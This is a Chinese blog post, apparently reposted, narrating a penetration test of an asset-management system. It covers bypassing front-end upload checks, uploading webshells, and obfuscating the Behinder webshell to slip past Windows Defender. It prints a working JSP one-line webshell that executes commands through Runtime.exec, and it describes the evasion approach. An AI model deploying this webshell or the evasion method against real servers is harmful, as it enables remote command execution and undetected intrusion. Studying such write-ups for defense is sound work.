某资产管理系统打点过程中的免杀经历

这篇具有很好参考价值的文章主要介绍了某资产管理系统打点过程中的免杀经历。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

上周初,被扔过来单位内部的一个链接,让渗透一下,本以为三下五除二很快就能测完,没想到在对抗杀软时费了一番功夫,再加上杂七杂八的事儿,经过了一个星期才测完(# ̄~ ̄#)。打开链接,见到一个熟悉的登录框,是一个资产管理系统。

在进行了一番端口目录、认证机制、会话管理、授权访问等方面的检查后发现了一些问题,这里不做赘述,此次重点想写写拿shell的经历。进入主页面,没用多长时间就找到了上传点,而且有两个。一个是头像上传,涉及裁剪、压缩等操作。

另一个是工具上传,允许直接上传文件(包)。两全伤害取其轻,就用这个。

创建个txt,随便加点内容进去,burp抓包看看这个功能的情况。

上传成功,并且有回显路径,有戏。

访问一下文件地址也展现出来了,直接上马子试试。

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

被阻断,不允许上传.java、.class、.jsp、.html等类型文件。一看就是之前经历过渗透测试,吃过亏(事后查了一下这家软件公司,做了不少企业的资产管理系统,是个成熟的项目,而且公司在2023年中已经上市,尽管在北交所,也必然会遵循一定的代码规范)。刚才上传用的是冰蝎4,查看burp的history中并无请求出现,证明是前端验证。尝试绕过前端验证,直接将冰蝎源码上传。

成功绕过,并且返回了文件路径……这就要完活儿了?!似乎有些轻松。访问一下:

404,文件没了。紧接着又拿哥斯拉试了一遍,同样是返回了路径,同样是404……猜测可能有杀软,落地文件被删除。接下来要做免杀了,使用在线工具对webshell进行变异,上传后一路404,更加确定杀软的存在。并且这款杀软的静态特征检测库还很全,如果仅仅混淆边边角角的代码是无法过它的,猜测它是能够匹配关键代码、关键API。

变异的厉害了还抛出了500,破坏了webshell自身的逻辑,甚至是添加了错误代码。看来省事儿的方式效果不理想,想要落地还是得自己动手,ε=(´ο`*)))唉。

最后使用了一个加长版的一句话木马才成功落地,请求如下:

访问文件路径并带上whoami。

直接就是administrator管理员。此马儿与传统的一句话jsp一样,也是用Runtime来执行命令,只不过前面加了一个参数pwd固定值判断,后面使用System.out来print一个String,并且这个String是命令执行的结果。

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

但是蚁剑不给力,连接时报500。尝试了多种设置均以失败告终,哪位大神研究过蚁剑还请指导一下,Thanks♪(・ω・)ノ。

测试到这个地步对于这个活儿来说其实可以交差了,已经拿到了权限,但如果想进行横向的话是无法继续利用的,所以还是要做免杀。掏出珍藏多年的idea(鄙视自己一下ε(┬┬﹏┬┬)3),打开冰蝎,调好格式,尝试做混淆。鉴于前面踩过坑,已经了解到该杀软能够检测到关键代码,所以直接分析源码。作为webshell,回显是必须的功能,而对于冰蝎来说,response数据来自于request.getReader().readLine()。因此直接对第18行动手,先用注释尝试一下,随便填加一些字符。

发送请求:

成功。访问一下回显路径:

空白页,没有报404,证明文件确实落地了,没有被杀掉。上冰蝎:

连接成功!免杀完毕。这次是真的可以交差了。进来后第一件事儿就是看看到底是哪个杀软在作祟:

MsMpEng.exe,微软的Windows Defender。

好奇心驱使,又拿了一个原版的冰蝎本地验证一下,果不其然,被秒杀(图中右上角的文件):

总结,这次拿shell的过程主要是在对抗杀软上耗费了很多时间,其次是在寻找杀软的进程上。因为服务器上一般都有专业杀毒软件或者HIDS防护,没有想到是Windows自己的Defender。虽然在写的时候只用一句话一张图带过,但在搜索进程的时候还特地整理了一份常见杀软的表格,挨个儿比对才有了最后那张图。

更多网安技能的在线实操练习,请点击这里>>

  文章来源地址https://www.toymoban.com/news/detail-837681.html

到了这里,关于某资产管理系统打点过程中的免杀经历的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 送你几款开源IDC资产管理系统

    更多运维技术,请关注微信公众号“运维之美” 对于公司机房运维人员来说,你的idc资产管理清单可能还记录在各种excel表格中,当设备和ip变动的时候进行手动更新,那可是太low了,看看这几款开源项目是否满足你的需求吧。 你可能面临如下问题: 分配的地址段占用了多少

    2024年02月05日
    浏览(47)
  • Java GUI,mybatis实现资产管理系统

    前言:为了做java课设,学了一手Java GUI。感觉蛮有意思的,写写文章,做个视频记录一下。欢迎大家友善指出我的不足 资产管理系统录制视频,从头敲到尾 资产信息管理 资产信息查询 【各种条件查询】 资产信息修改( 不能对资产进行领用、归还、报废 ) 资产信息增加 资

    2024年02月13日
    浏览(50)
  • Docker中部署chemex开源资产管理系统

    本文讲解在使用docker部署chemex系统时遇到的问题,仅供参考,数据库部署部分不在此文列出 部署前先在在mysql上为chemex创建库 使用docker部署chemex时官方步骤如下:  注意: 如在启动chemex容器前加入 -

    2024年02月12日
    浏览(39)
  • 开源IT资产管理系统Snipe-IT

    本文完成于 8 月初,正好网友 chenlit 在找用于管理固定资产容器和套件,不知道 Snipe-IT 是否能满足他的需求; 什么是 Snipe-IT ? Snipe-IT 是一个用 PHP 编写的免费开源 IT 资产管理系统。 Snipe-IT 专为 IT 资产管理而设计,使 IT 部门能够跟踪谁拥有哪台笔记本电脑、何时购买、有哪

    2024年02月05日
    浏览(50)
  • Vb+access高校固定资产管理系统(论文+程序)

    随着电脑的普及与使用,现在的管理也提升了一个档次,渐渐实现了无纸化办公,即从原来的人工记录管理模式转变为电脑一体化管理。高校是科研的阵地,后勤的高校固定资产管理系统也应该一改传统的人工管理,更加信息化,时代化,节省人力物力,提高效率。基于这一

    2024年02月10日
    浏览(72)
  • Access + VBA 固定资产管理系统 —— 显示/隐藏窗体设置

    本系统是基于Access数据库和VBA进行开发的,由于Access数据库拥有强大的窗体创建和设置功能,固本系统已Access数据库为主,VBA编程为辅,VBA主要完成了部分相对复杂功能的实现。 若设置为按钮控制程序背景的显示和隐藏: 创建相关按钮,如”显示程序背景“和”隐藏程序背

    2024年02月06日
    浏览(90)
  • 计算机毕业设计-----SSH固定资产管理系统

    项目介绍 固定资产管理系统是对高校固定资产的一个信息化管理系统,基本功能包括:对固定资产的购进、接触、销毁,对物品的使用状态、借出状态、库存状态等进行标识,对各类物品进行编号,根据编号进行查询,根据名称进行查询等。本系统结构如下: (1)系统登录

    2024年01月19日
    浏览(47)
  • 基于Java web的资产管理系统 毕业设计开题报告

     博主介绍 :《Vue.js入门与商城开发实战》《微信小程序商城开发》图书作者,CSDN博客专家,在线教育专家,CSDN钻石讲师;专注大学生毕业设计教育和辅导。 所有项目都配有从入门到精通的基础知识视频课程,免费 项目配有对应开发文档、开题报告、任务书、PPT、论文模版

    2024年02月04日
    浏览(102)
  • IDEA+SpringBoot + Mybatis + Shiro+Bootstrap+Mysql资产设备管理系统

    本系统实现了资产设备管理系统,管理端实现了管理员登录、用户新增、用户设置、岗位管理、审批节点、人员查询、组织设置、人员调整、角色设置、角色模块映射、模块设置、应用模块、光纤交换机、服务器、网络设备、存储设备、安全设备、机房设备、网点设备、资产

    2024年02月16日
    浏览(42)
  • 基于Springboot的高校固定资产管理系统的设计与实现(源码完整)

    项目描述 临近学期结束,还是毕业设计,你还在做java程序网络编程,期末作业,老师的作业要求觉得大了吗?不知道毕业设计该怎么办?网页功能的数量是否太多?没有合适的类型或系统?等等。这里根据你想解决的问题,今天给大家介绍一篇基于Springboot的高校固定资产管理系统

    2024年02月07日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包